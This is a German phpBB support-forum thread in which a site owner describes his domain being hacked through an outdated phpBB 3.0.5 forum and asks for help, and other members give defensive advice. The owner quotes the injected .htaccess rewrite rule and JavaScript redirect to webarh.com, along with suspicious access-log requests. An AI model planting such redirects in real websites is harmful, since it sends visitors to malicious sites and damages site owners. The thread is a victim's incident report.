Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
stoertie
Mitglied
Beiträge: 86
Registriert: 30.09.2005 20:02
Kontaktdaten:
Kontaktdaten von stoertie

Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von stoertie »

Hallo zusammen,

unser Webspace wurde am vergangenen Wochenende gehackt und mit "webarh.com" infiziert. (Näheres zu dieser "Infektion" unter diesem Link )

Auf dem Webspace lag neben dem phpbb3-Forum nur noch phpmyadmin, die HTML Startseite zu unserer kommerziellen Seite und ein paar in diversen Ordnern verteilte Bilder.

Ich gestehe auch gleich, dass das Forum noch in der Version 3.0.5 installiert war... :oops:


Der Infrekt wirkte sich jedenfalls so aus, dass in allen Ordnern eine .htaccess Datei abgelegt wurde die folgenden Inhalt hatte:

Code: Alles auswählen

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/dbcab8eea60ec75e98086c2884d0afc4
außerdem wurde in jeder Index.html, bzw Index.php das folgende Script ganz am Anfang vor dem ersten TAG eingefügt:

Code: Alles auswählen

<script>document.location.href='http://webarh.com/4d6195a527923898c6931f00385946d1';</script>
Nach durchforsten der Weblogs bin ich lediglich über merkwürdig aussehende Einträge von ausnahmslos ukrainischen IP-Adressen ( 213.231.60.3 - 109.200.225.49 - 213.231.35.225 - 109.200.236.184 - 109.200.243.6 - 109.200.243.0) gestossen. Dabei andelt es sich immer um drei aufeinander folgende Einträge, die alle in etwa so wie im folgenden Beispiel aussehen:

Code: Alles auswählen

213.231.60.3 - - [02/Dec/2010:10:40:26 +0100] "GET /phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2; HTTP/1.0" 200 17463 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

213.231.60.3 - - [02/Dec/2010:10:40:26 +0100] "GET /phpBB3/ucp.php?mode=confirm&id=83f01a707998c3a36dfc83103c33e1f6&type=3&sid=4085b78a7c16f141fcbd11b0eb84e26d HTTP/1.0" 200 9081 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

213.231.60.3 - - [02/Dec/2010:10:40:32 +0100] "POST /phpBB3/posting.php?mode=post&f=13&sid=4085b78a7c16f141fcbd11b0eb84e26d HTTP/1.0" 200 16485 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Nachdem ich alle Index-Dateien gesäubert und die .htaccess Dateien gelöscht hatte, habe ich alle Server-Passwörter geändert. Danach lief alles wieder einwandfrei, allerdings gerade mal 24 Stunden. - Dann waren dann wieder alle .htaccess-Dateien und Änderungen an den index-Dateien in ähnlicher Form da. :o


Ich habe nun das Forum vorerst komplett vom Server gelöscht und seit dem ist Ruhe.

Ich bin jetzt natürlich etwas verunsichert, was die Neuinstallation des Forums betrifft, da es für mich ganz danach aussieht, dass die "Freunde" aus der Ukraine über das Forum eingedrungen sind, deshalb meine Fragen in die Runde:

1. Kann vielleicht jemand von Euch die Logs entschlüsseln um diese Annahme zu bestägigen, bzw. zu entkräften?

2. Bringt es für die Sicherheit der Geschäflich genutzten Startseite etwas, wenn ich die Neuinstallation auf einer Sub-Domain durchführe?

3. Gab es bei den Versionen vor 3.0.8 irgendwelche Sicherheits-/Schlupflöcher für diese Art von Angriffen, die jetzt geschlossen sind?

4. Wie kann ich solche Angriffe zukünftig verhindern? ;) (Klar 100%ige Sicherheit wird es nie geben, aber 99% wären ja auch schon was... :D )


Ich würde mich freuen, wenn jemand meine Fragen beantworten, bzw etwas dazu sagen könnte...

Viele Grüße aus dem Norden
Michael
Nach oben
Benutzeravatar
Metzle
Ehemaliges Teammitglied
Beiträge: 10435
Registriert: 08.03.2008 02:50
Wohnort: Waiblingen-Neustadt
Kontaktdaten:
Kontaktdaten von Metzle

Re: Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von Metzle »

Hallo,

schau mal hier: KB:gehackt

Oftmals ist der Infekt auf dem eigenen PC, der dann per FTP übertragen wird ;)
Metzle
phpBB.de-Support-Team
Allround-phpBB.de
Nach oben
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:
Kontaktdaten von larsneo

Re: Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von larsneo »

Auf dem Webspace lag neben dem phpbb3-Forum nur noch phpmyadmin
*klick* vermeldet beispielsweise phpmysql bzw.gerade phpmyadmin als einfallstor - secunia advisory, search pattern im log: "/scripts/setup.php" - welche phpmyadmin-version hast du im einsatz?
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Nach oben
Benutzeravatar
zx9r-treiber
Mitglied
Beiträge: 1401
Registriert: 05.10.2007 16:26
Wohnort: Moormerland
Kontaktdaten:
Kontaktdaten von zx9r-treiber

Re: Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von zx9r-treiber »

Wenn du dein Forum wieder installierst, dann gleich die neue phpBB3.0.8
Lege deine Domain vorher schon auf https. Viele Anbieter bieten dieses Sicherheitszertivikat für 1 Domain kostenlos an.
Das anlegen einer Subdomain alleine verhindert das Hacken nicht. Gehe besser auf den höchsten Sicherheitsstand den dein Anbieter zuläßt.
Dann wie gesagt sich an https://www.phpbb.de/kb/gehackt halten.

Ich habe vor gut Monat 1 Forum auf https umgestellt und komplett neu Installiert, aber die Datensätze des alten Forum wieder eingebaut nach Überprüfung ob sie "sauer" sind.
Seid her ist Ruhe eingekehrt.
Gruß
M&K (Michael & Kathy)
"Unser Problem ist auch nicht die Globale Erwärmung ..... sondern die Globale Verblödung!"
Nach oben
stoertie
Mitglied
Beiträge: 86
Registriert: 30.09.2005 20:02
Kontaktdaten:
Kontaktdaten von stoertie

Re: Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von stoertie »

Hallo zusammen,

zuerst einmal ganz pauschal vielen Dank für Eure Reaktionen... ;)

@Metzle:
Das hatte ich auch schon gefunden... und werde (bzw. habe es schon) es ganz bestimmt beherzigen. ;)

@larsneo:

Der phpmyadmin war sicher schon älter... allerdings hat keine IP darauf zugegriffen, die auch auf das Forum zugegriffen hat. Nicht einmal aus dem selben Land. - Kann natürlich sein, dass der Hack gar nicht aus der Ukraine kam, nur die im Log erfassten Datensätze sind halt sehr kurz (kenne mich mit den Inhalten der Logs ja leider nicht so wirklich aus. :-( )

Jedenfalls brauche den phpmyadmin ehhh nicht mehr und habe sie mittlerweile von allen Domains gelöscht. :wink:

Meinen Rechner als überträger möchte ich eigentlich mal ziemlich weit nach hinten in der Liste der Möglichkeiten schieben. Da ich zwei phpBB3-Foren von meinem Rechner aus verwalte, müsste es dann ja eigentlich beide erwischt haben... zumindest aber sollte die Wahrscheinlichkeit sehr hoch sein und das Zweite Forum läuft perfekt.


@zx9r-treiber:
Klar dass ich die aktuelle Version installiere...
Die Frage nach der Sub-Domain bezog sich eigentlich auch nicht auf das Hacken des Forums selbst. Das ist zwar ärgerlich, aber damit könnten wir noch leben, soooo immens wichtig ist das nicht. Für sind die Veränderungen an der Hauptseite viel Schlimmer (Die Gefahrenmeldung bei Google, Alarmmeldungen von Vierenscannern bei Aufruf der Seite durch Kunden usw. )
Da wäre es halt schön zu wissen, ob zu erwarten ist, dass sich ein erneuter Hack nur auf die Domain "http://forum.meineDomain.de" infiziert oder eben auch auf "http://www.MeineDomain.de" überspringt.


Viele Grüße aus dem Norden
Michael
Nach oben
Benutzeravatar
zx9r-treiber
Mitglied
Beiträge: 1401
Registriert: 05.10.2007 16:26
Wohnort: Moormerland
Kontaktdaten:
Kontaktdaten von zx9r-treiber

Re: Sicherheitslücke im phpbb3??? - Domain wurde gehackt!

Beitrag von zx9r-treiber »

stoertie hat geschrieben:

@zx9r-treiber:
......
Da wäre es halt schön zu wissen, ob zu erwarten ist, dass sich ein erneuter Hack nur auf die Domain "http://forum.meineDomain.de" infiziert oder eben auch auf "http://www.MeineDomain.de" überspringt.


Viele Grüße aus dem Norden
Michael
Nun, bei mir bezog es sich nicht auf die Komplette "http://www.MeineDomain.de" (also nicht auf den gesammten Serverbereich)
Ich habe auch für das Forum eine eigene Domain. Auf dem Server verwalte ich insgesammt 6 Domain und 5 Subdomain.

Ich habe auch nur die Domain für das Forum über "https" gesetzt.
2 andere phpBB3 Forum, die ebenfalls auf meinem Server laufen (mit eigener Domain) ist nichts passiert. Die laufen vor wie nach ganz normal.

Ich hatte auch den Hackerangriff sehr schnell bemerkt und das Forum sofort Deaktiviert. Google und Co hatten es zwar bemerkt und die Meldung schon verarbeitet, aber 1 Woche nach Säuberung und Neuinstallation war diese Meldung auch wieder weg. (Hatte ich Google auch in einer Mail mitgeteilt das das Forum wieder "sauber" ist. Seid dem sind die über 100 mal täglich da, was wohl nur als Vorteil zu sehen ist)
Gruß
M&K (Michael & Kathy)
"Unser Problem ist auch nicht die Globale Erwärmung ..... sondern die Globale Verblödung!"
Nach oben
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“